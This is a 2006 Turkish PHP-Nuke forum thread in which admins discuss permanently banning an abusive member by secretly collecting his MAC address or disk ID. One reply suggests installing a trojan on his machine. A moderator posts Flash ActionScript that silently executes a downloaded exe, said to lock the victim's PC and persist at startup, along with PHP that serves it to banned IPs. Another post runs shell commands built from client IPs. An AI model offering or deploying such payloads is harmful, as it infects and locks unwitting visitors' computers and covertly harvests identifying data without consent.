Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 771
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4680 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(7865 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3275 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(9581 okuma, 10 yanıt)
 Nuke Sentinel..
(4313 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(4844 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3398 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(9883 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9152 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5107 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(40429 okuma, 45 yanıt)
 Bu bir saldırmı..
(8030 okuma, 7 yanıt)
 siteme virüs girmis..
(8145 okuma, 6 yanıt)
 Sitedekileri atmak..
(5115 okuma, 2 yanıt)
 Kötü botları engellemek...
(11015 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7051 okuma, 5 yanıt)
 index atılamayan site yap..
(6937 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5228 okuma, 2 yanıt)
 js trojandownloader.agent..
(5662 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7360 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(4861 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(5840 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(13607 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(26159 okuma, 25 yanıt)
 hacklendim mi?..
(5902 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(75305 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4379 okuma, 1 yanıt)
 Site neden Google i banla..
(4123 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6130 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7153 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7199 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(9646 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(6925 okuma, 5 yanıt)
 forum için kod yazma yasa..
(4843 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4627 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5181 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4696 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3417 okuma, 0 yanıt)
 Protector' deki Host İs..
(3430 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7449 okuma, 7 yanıt)
 index dosyasının chmod k..
(4002 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3578 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(7735 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4422 okuma, 1 yanıt)
 Nuke Güvenlik..
(157179 okuma, 257 yanıt)
 bütün index lere iframe e..
(18386 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5623 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(23900 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(18648 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3725 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - İstenmeyen Üyeyi Dışlamak İçin Script Yazalım.
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 

İstenmeyen Üyeyi Dışlamak İçin Script Yazalım.

Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
djalpha

MesajTarih: 2006-06-04, 00:33:29    Mesaj konusu: İstenmeyen Üyeyi Dışlamak İçin Script Yazalım. Alıntıyla Cevap Gönder

Merhaba arkadaşlar uzun süredir phpnuke kullanırım en güvendiğim konurnma yöntemi Pretector'dür. Belki daha iyileri vardır sentinel de mutlaka iyidir ama buna alıştığım için böyle geldi böyle gidiyor.

Benim üstatlardan ricam şudur.

[+] Protector'de üyenin ismini IP arama panelinden arattık bir sürü IP ile üyenin adı ortaya çıktı üyeyi orada en son geldiği IP'den banladık. Never seçerek daima banlı kalmasını sağladık ama sanırım üye yeni üyelik alarak tekrar girebiliyor giremiyorsada bana eski üye yeni nick alıp girmeyi denedi diye bir uyarı gelmediğine göre girmektedir.
Öyle bir şey olmalı ki bu üyeye gizlice bir c o o k i e yerleştirmeli ve sitemize ait c o o k i eleri silse bile (c o o k i eleri komple boşaltmadığı sürece) yeni üyelik bile açmaya kalksa bunu sistem anlamalı ve onu içeri almamalıdır.
Kısaca istenmeyen küfürbaz üyeleri değişken IP leri olduğu için daha sağlam banlama yolu nedir bir bilgisi olan varsa y_ardım ederse çok sevinirim sanırım sıradan korunma yöntemleri ile bu mümkün değil kendimize bir script yazmalı ve o kişinin bilgisayarına işaret bırakmalıyız bu işareti phpnuke indexinden algılayıp o kişiyi hiçbir şekilde içeri almamalıdır.

Sevgilerimle.

En son djalpha tarafından 2006-06-04, 00:35:54 tarihinde değiştirildi, toplam 1 kere değiştirildi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor

Tarih: 2024-04-27, 15:53:43    Mesaj konusu: Forum Arası Reklamlar

Başa dön
minber

MesajTarih: 2006-06-04, 00:35:44    Mesaj konusu: Re: İstenmeyen Üyeyi Dışlamak İçin Script Yazalım. Alıntıyla Cevap Gönder

Bildiğim kadarı ile sentinel de bu aradığın özellik var.
Başa dön
HunTürk

MesajTarih: 2006-06-04, 00:38:04    Mesaj konusu: Alıntıyla Cevap Gönder

Üyenin şifresini ve e-posta adresini değiştir.. En garanti yöntem işte.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
djalpha

MesajTarih: 2006-06-04, 00:40:03    Mesaj konusu: Alıntıyla Cevap Gönder

minber çabuk cevap için teşekkür ederim şimdi araştıracağım onu bir bilen senitineldeki bu özelliğin ne olarak geçtiğini belirtirse sevinirim. Sitemede PHP-Nuke Platinum v.7.6.b.4 kurayım onda her iki sistemde mevcuttu çünkü yinede yukarıdaki fikri olgunlaştırıp kendimize özel bir şey yaparsak daha iyi olacaktır bununda tek güvenli yolu vardır arkadaşlar MAC ID yada HARDDISK ID den o kişiyi saptamaktır, bunu sorgulayacak appet i ise benim yazmam mümkün değil sadece registry de nereye bakması gerektiğini bilebilirim.
Başa dön
djalpha

MesajTarih: 2006-06-04, 00:44:44    Mesaj konusu: Alıntıyla Cevap Gönder

atomcuk :
Üyenin şifresini ve e-posta adresini değiştir.. En garanti yöntem işte.

sevgili atomcuk o isimle girmez ama bildiğin gibi bir emaili alıp ona ait başka bir üyelik açmak çok kolay ayrıcada statik olmayaqn daima değişen IP lerden dolayı daha agresif bir yöntem geliştirmekten ve sıradan korunma yöntemlerinden (cookilere bakmak, IP yi banlamak, üye adını işlemez hale getirmek) daha agresif bir yöntem geliştirmekten söz ediyorum üyenin o hesaba emaili ve şifresi değiştiği için girmesini önleyemeyiz eski kullandığı email ile yine bu sefer uyeadi2 şeklinde üye olup yine giriş yaparak insanları rahatsız etmeye devam edecektir siz admin olarakda bundan haberiniz olmayacak arka planda aslında sitenizi zıvanadan ve amacından uzaklaştıracak bir sürü üyenin iyi niyetlileri sömürmesinden dolayı siz fark etmeden siteniz güme gitmeye sizin hayal ettiğiniz amacından şaşmaya başlayacaktır.
Başa dön
HunTürk

MesajTarih: 2006-06-04, 00:54:53    Mesaj konusu: Alıntıyla Cevap Gönder

Önleyemessin ki. Nasıl önleyeceksin. İpyi banlasan bile. Proxy ile girer. Statik ipsini dinamiğe çevirtir. Yani bunun önlemi yok. İstediğin kadar uğraş. Adam gider netvafelerden girer yine rahatsız eder.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
djalpha

MesajTarih: 2006-06-04, 00:59:06    Mesaj konusu: Alıntıyla Cevap Gönder

onun MAC ID sini yada HARDDISK ID sini alırsam (registry den bir kaç bilgi çekerek) aliamallah giremez yolunu arıyorum inşallah burada çözeceğiz çok kararlıyım. Biri sitenize girmek istiyorsa önüne minik bir applet çıkmalı ve buna izin vermiyorsa girememelidir buna izin verdiğinde ise size o bilgileri registryden çektirecek applet yüklenecektir kişinin haberi olmayacaktır ve nuke_users tablosuna mac ıd ile drive ID kolonlarına bu bilgiler yazılacaktır. IP değişebilirsin herşeyi değişebilirsin ama bilgisayarını formatlasanda mac ID değişemez sadece harddisk ID değişirsiniz her girdiğinizde ise PC yi formatlamayı tercih etmezsiniz.
not: Tabiiki girmek isteyen bir şeklide girecektir amaç lamerleri yani 100 tane tekrar üye olup giren agresif rahatsız edici üyeden 98 tanesini önlemektir emin olun tüm üyeler saklanamadıklarını anlayınca kuzu olacaktır.
Başa dön
HunTürk

MesajTarih: 2006-06-04, 01:03:21    Mesaj konusu: Alıntıyla Cevap Gönder

Yapabilirsen adamın bilgisiyarına truva atını yükleteceksin. O programcık adamın bilgisiyarında istedğin sitelere girememesini sağlatacaksın ki o zaman sadece elama kendi bilgisiyarından giremessin. Bilgisiyar müh. arkadaşın falan varsa olabilir.

Kolay gelsin.
Başa dön
Bu Site Google Adsense ile Gelir Elde Ediyor

Tarih: 2024-04-27, 15:53:43    Mesaj konusu: Forum Arası Reklamlar

Başa dön
djalpha

MesajTarih: 2006-06-04, 01:28:13    Mesaj konusu: Alıntıyla Cevap Gönder

Humm bu etik değil benim amacım evim olan siteme istemediğim kişiyi sokmamak ve sadece registryden 1 anahtarı çağırabilip nuke_users tablosuna işlemek istiyorum. Lütfen bu projemi ve fikrimi yararlı olarak geliştirelim asla bilgisayarına zarar vermemeli sadece nasıl IP adresini yada alexa toolbar kullandığı explorer versiyonu bilgilerini çekebiliyorsak MAC ID sini de (bu public bir bilgidir gizli değildir internete başlanıyorsanız bir ağa girmişsinizdir ve bu ağda IP yada MAC ID ile gezersiniz) registrysinden yada packet bilgilerinden çekerek kişisel bilgilerine bir tane daha bilgi eklemektir.
Bu sayede bu kişi ip sini değiştirse bile eternet kartını değişmediği sürece bildiğim kadarı ile MAC ID sabit kalacaktır.
Bu konu chat gibi ilerliyorsa şimdiden özür dilerim, fikirleri bir topluma açıklamak onları kaybetmek riskini göze almaktır ama bu fikir bir çok şeyin düzelmesine hizmet edecekse seve seve başkalarının kullanıp paylaşmasını isterim.
Başa dön
KaaN

MesajTarih: 2006-06-04, 09:39:14    Mesaj konusu: Alıntıyla Cevap Gönder

Bana göre bu biraz kısır döngü. Nereyi banlarsanız banlayın bir şekilde bir açığını bulup giriyor. Mec adresini banlamak ne kadar mantıklı bilmiyorum. Eğer adam internet kafeden giriyorsa ya da internet kafe işletiyorsa onu engelleyemezsin. Elinde onlarca makine varsa ondan kalar onda girer. Dersen ki o mec adresini ve onun ağındaki mec adresini banlasın dersen, ya aynı kafeden bir başkası da giriyorsa o kafeden ne olacak ?
Başa dön
seyranli

MesajTarih: 2006-06-05, 05:49:05    Mesaj konusu: Alıntıyla Cevap Gönder

djalpha güzel düşünmüşsün ancak mac ip illaki donanımsal araçlarla değişmiyor, bilgisayarı fpormatladığında veya başlat-çalıştır/regedit ile de bu numarayı değiştirebiliyosun. yine de güzel bi fikir bu adres nsaıl alınır diyorsan bunun için yazılmış fonksiyonları veya direk shell komutlarını internetten bulabilmek mümkündür. denemedim ama yazayım
kullanıcının ip sini aldıktan sonra şunu yapabilirsin
Kod:
$mac = `ping $ip && arp -a | grep $ip` 

tabi ping sayısını falan da kontrol altında tutabilmen lazım, yoksa host kasılır yok yere, veya şu komutları kullanabilirsin
Kod:

function returnMacAddress() {
// This code is under the GNU Public Licence
// Written by michael_stankiewicz {don't spam} at yahoo {no spam} dot com
// Tested only on linux, please report bugs

// WARNING: the commands 'which' and 'arp' should be executable
// by the apache user; on most linux boxes the default configuration
// should work fine

// Get the arp executable path
$location = `which arp`;
// Execute the arp command and store the output in $arpTable
$arpTable = `$location`;
// Split the output so every line is an entry of the $arpSplitted array
$arpSplitted = split("\n",$arpTable);
// Get the remote ip address (the ip address of the client, the browser)
$remoteIp = $GLOBALS['REMOTE_ADDR'];
// Cicle the array to find the match with the remote ip address
foreach ($arpSplitted as $value) {
// Split every arp line, this is done in case the format of the arp
// command output is a bit different than expected
$valueSplitted = split(" ",$value);
foreach ($valueSplitted as $spLine) {
if (preg_match("/$remoteIp/",$spLine)) {
$ipFound = true;
}
// The ip address has been found, now rescan all the string
// to get the mac address
if ($ipFound) {
// Rescan all the string, in case the mac address, in the string
// returned by arp, comes before the ip address
// (you know, Murphy's laws)
reset($valueSplitted);
foreach ($valueSplitted as $spLine) {
if (preg_match("/[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f][:-]".
"[0-9a-f][0-9a-f]/i",$spLine)) {
return $spLine;
}
}
}
$ipFound = false;
}
}
return false;
}

ama dediğim gibi bu numaralarda değiştirilebilir, özellikle bunu yapacağın yerdeki üyeler bilgisayar hakkında bilgiliyse hiç uğraşma derim. Ha diyosanki nolursa olsun ben bunu yapacağım, elimden geldiğince YARDIM etmeye de çalıırım.
Başa dön
saho
Forum Yöneticisi
Forum Yöneticisi

MesajTarih: 2006-06-05, 13:02:35    Mesaj konusu: Alıntıyla Cevap Gönder

mac hakkında fazla bir bilgim yok ama
küfürlerini config.php de ki censor list ten yada
php nin str_replace fonksiyonu ile küfürleri engelleyebilirsin detaylar için
www.php.net/str_replace
ip sini dei

192.168.1.35 ten girdi 38 den girdi 65 den girdi mesala
192.168.1
yaz ban paneline diğerlerinin hepsini banlasın
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
djalpha

MesajTarih: 2006-06-05, 20:07:11    Mesaj konusu: Alıntıyla Cevap Gönder

Öncelikle cevaplar için teşekkür ederim.

Daha öncede belirttiğim gibi bilgili bir crackerin saldırısını engellemekten değil siteye gelen sıradan üyelerden (kız aramak, kendini polat sanmak, kafayı takmış olmak) daima yeniden farklı email ile üyelik açmasını engellemek üzerine bir projedir. Bu proje gerçekleştiğinde bir güzel şansa daha sahip olacaksınız o da aynı üyeleri tek bir query ile ortaya çıkarabileceksiniz çünkü üye adı, email, IP değişir ama defalarca söylediğim gibi MAC ID yada Harddisc ID si değişmez. (değişirsede uğraştırır o kadar uğraşanla uğraşmayı zaten hedeflemiyoruz)

Panelimize aynı MAC ID li üyelikleri dök dediğimizde hepsi ortaya dökülecektir bunların aynı CAFE de olması yada aynı evdeki kardeşler olması hiç mühüm değildir bir çoğumuz 10.000 lerce üyeli portal yönetiyoruz bir kaç istisna için huzurun bozuk gitmesini istemeyerek istisna engellenenleri de email iletişimi ile size baş vurduklarında zaten çözümlersiniz.

Bilgim ve eğitimim script yazmak SQL e sorgular üretmek üzerine değildir sadece web portal yöneticisiyim bu açıdan deneyimli arkadaşlardan y_ardım bekliyorum fikrimi kodlayıp içine adını koyan emin olun kısa sürede kahraman bir güvenlik sağlayıcı program yapmış olacaklar, ardından bu güvenliğin nasıl aşılacağı ile ilgili bir ton yöntem çıkabilir mühim değil biz internet kurtları ile değil kolay kullanıcıyı etkili bir yöntemle dışarda bırakmaya çalışıyoruz!
Başa dön
djalpha

MesajTarih: 2006-06-05, 23:06:18    Mesaj konusu: Alıntıyla Cevap Gönder

Arkadaşlar registryden PHP komutları ile anahtar çekebileceğimiz kodu bulabilirsek bu iş tamam görünüyor.
Başa dön
seyranli

MesajTarih: 2006-06-06, 03:42:15    Mesaj konusu: Alıntıyla Cevap Gönder

valla kardeşbaktım ama hemen hepsinde exec komutu var, ki bu da güvenlik açığı oluşturmasından dolayı kapalıdır yani
Başa dön
saho
Forum Yöneticisi
Forum Yöneticisi

MesajTarih: 2006-06-06, 10:40:01    Mesaj konusu: Alıntıyla Cevap Gönder

bunun için flash mx2004 ten eski bir sürüm flash lazım ben de
flash pro 8 var
mx 2004 ten sonra güvenlik dolayısıyla kapanan
Kod:

on (release) {
fscommand("exec","saho.exe")
}

yeni bir flash dosyası açmak içine action script alanına bunu yazmak sonra swf olarak publish etmek

saho.exe ile aynı dizine swf yi koymak

sonrada mesala basit birşey phpnuke nin ban ekranına
embed src=swfyolu.swf ile swf yolunu belirtmek sonra

saho.exe içeriğini kafanıza göre ayarlayın mesala şu
www.dunyali.com/phphack.exe
bu xp de 98 de hepsinde çalışıyor swf içine bunu çağırın exec ile şahsın pc si 3-5 sn sonra kitlenir daha sonra da kendisini başlangıça kopyalamaktadır bu exe

gameturkey.com webmaster serkan arkadaşımız yazmıştı zamanında duruyor bende bu işte kullanılabilir

yada phpnuke nin ban ekranı yerine şahsın ip sini biliyor isek

mesala header.php nin en üstüne
include"ban.php"; yazalım
ban.php yi root a atalım
içeriğinede
Kod:

<?php//saho
$ip = GETENV("REMOTE_ADDR");
$yasaklilar = array("192.168.1.1","160.150.140.130" );
if ($ip == '$yasaklilar')  { echo"[embed src=swfyolu.swf]"; } else { 
}// bu son elsenin kapanışı header.php ninen altında ?> bundan hemen önce konmalı
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et MSN Messenger
saho
Forum Yöneticisi
Forum Yöneticisi

MesajTarih: 2006-06-06, 10:41:21    Mesaj konusu: Alıntıyla Cevap Gönder

unutmadan [ ]bunları html tag açılış kapanış komutu ile değiştirmemiz lazım diğer türlü forum almaz : )
Başa dön
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız